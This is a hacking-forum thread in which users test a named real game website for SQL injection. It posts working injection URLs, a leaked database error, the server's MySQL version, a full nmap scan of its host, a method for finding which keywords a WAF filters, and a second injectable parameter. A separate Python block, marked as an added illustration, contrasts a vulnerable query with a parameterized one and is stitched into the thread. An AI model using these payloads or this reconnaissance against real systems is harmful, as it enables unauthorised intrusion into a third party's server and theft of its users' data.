EvilZone
Hacking and Security: fr0wnR, December 10, 2012, 06:26:34 PM
-
www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --
This works, I'm getting a sql error:
Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1
Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that it's not injectable, or am I doing something wrong?
This would be my idea with @@version:
tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --
The SQL query then:
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out
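As an added illustration (not code from the thread or from the Tantrix CGI; the table, its rows and the function names are constructed, and SQLite stands in for MySQL): the LIKE query visible in the error message, once built by string concatenation and once with a bound parameter, plus the kind of single-keyword blocklist a later reply describes, to show why only the parameterized version actually closes the hole.

```python
import sqlite3

# Constructed sample data mirroring the columns named in the error message.
PLAYERS = [
    (1, "alice", "alice@example.com", "Spain", "2010-01-01"),
    (2, "bob", "bob@example.com", "Germany", "2011-06-15"),
    (3, "carol", "carol@example.com", "France", "2012-03-20"),
]

BASE = "SELECT uid,player_name,e_mail,country,date_joined FROM players "


def make_db():
    """In-memory stand-in for the players table (SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (uid INTEGER, player_name TEXT, "
                 "e_mail TEXT, country TEXT, date_joined TEXT)")
    conn.executemany("INSERT INTO players VALUES (?,?,?,?,?)", PLAYERS)
    return conn


def blocklist_filter(pname):
    """Hypothetical filter of the kind the thread observes: rejects only 'from'.
    Returns None when the input is rejected, otherwise the input unchanged."""
    return None if "from" in pname.lower() else pname


def lookup_vulnerable(conn, pname):
    """User input is pasted into the SQL text, so quotes and comment markers
    are parsed as SQL. This is the pattern the error message reveals."""
    sql = BASE + "WHERE player_name LIKE '%" + pname + "%' ORDER BY date_joined DESC"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, pname):
    """The wildcard pattern is passed as a bound parameter; whatever the user
    types is compared as data and never reaches the SQL parser."""
    sql = BASE + "WHERE player_name LIKE ? ORDER BY date_joined DESC"
    return conn.execute(sql, ("%" + pname + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1 -- "          # contains no "from", so the blocklist passes it
    assert blocklist_filter(probe) == probe
    print("vulnerable:", len(lookup_vulnerable(db, probe)), "rows")   # every row
    print("parameterized:", len(lookup_safe(db, probe)), "rows")      # no match
```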
-
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
-
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
Hmm, doesn't work either..
I will try encoding it, but I don't think this will change anything.
Is it really not injectable?
-
Without trying myself I can already say:
.... that corresponds to your MySQL server version for ...
...got it?
-
Wait this is genius :D
They have MySQL 5.0.91-community.
Will read through the changes, thank you!
-
Well I took a deeper look at the vulnerability.
It is indeed injectable. But there is a simple WAF, aka filtering, going on. It's just the select keyword "from" that gets filtered, and /etc/passwd as I noticed, but nothing else so far.
Conclusion: You cannot bypass the keyword "from" and you don't have file privileges. You can extract the information about the player table with the given Select statement but beside that there is no exploitation by sqli possible on this parameter.
Apache is 1.3.41 though ...
cheers
-
Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.
Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
Interesting ports on 69.36.8.247:
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
25/tcp open smtp Courier smtpd
26/tcp open smtp Courier smtpd
53/tcp open domain ISC BIND 9.2.4
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
110/tcp open pop3 Courier pop3d
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap Courier Imapd (released 2010)
443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
445/tcp filtered microsoft-ds
587/tcp open smtp Courier smtpd
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
3000/tcp open http ServerCP httpd
3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
3306/tcp open mysql MySQL 5.0.91-community
4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
5432/tcp open postgresql PostgreSQL DB
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
Service Info: Host: server2.tantrix.com; OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds
-
How did you find out which keywords are getting filtered out? Just trying or software?
Comment out the rest of the string and type your keywords into the comment part.
... 1,2,3,4,5 -- xx from
By the way: Just by clicking around I already found an orderby injection:
http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain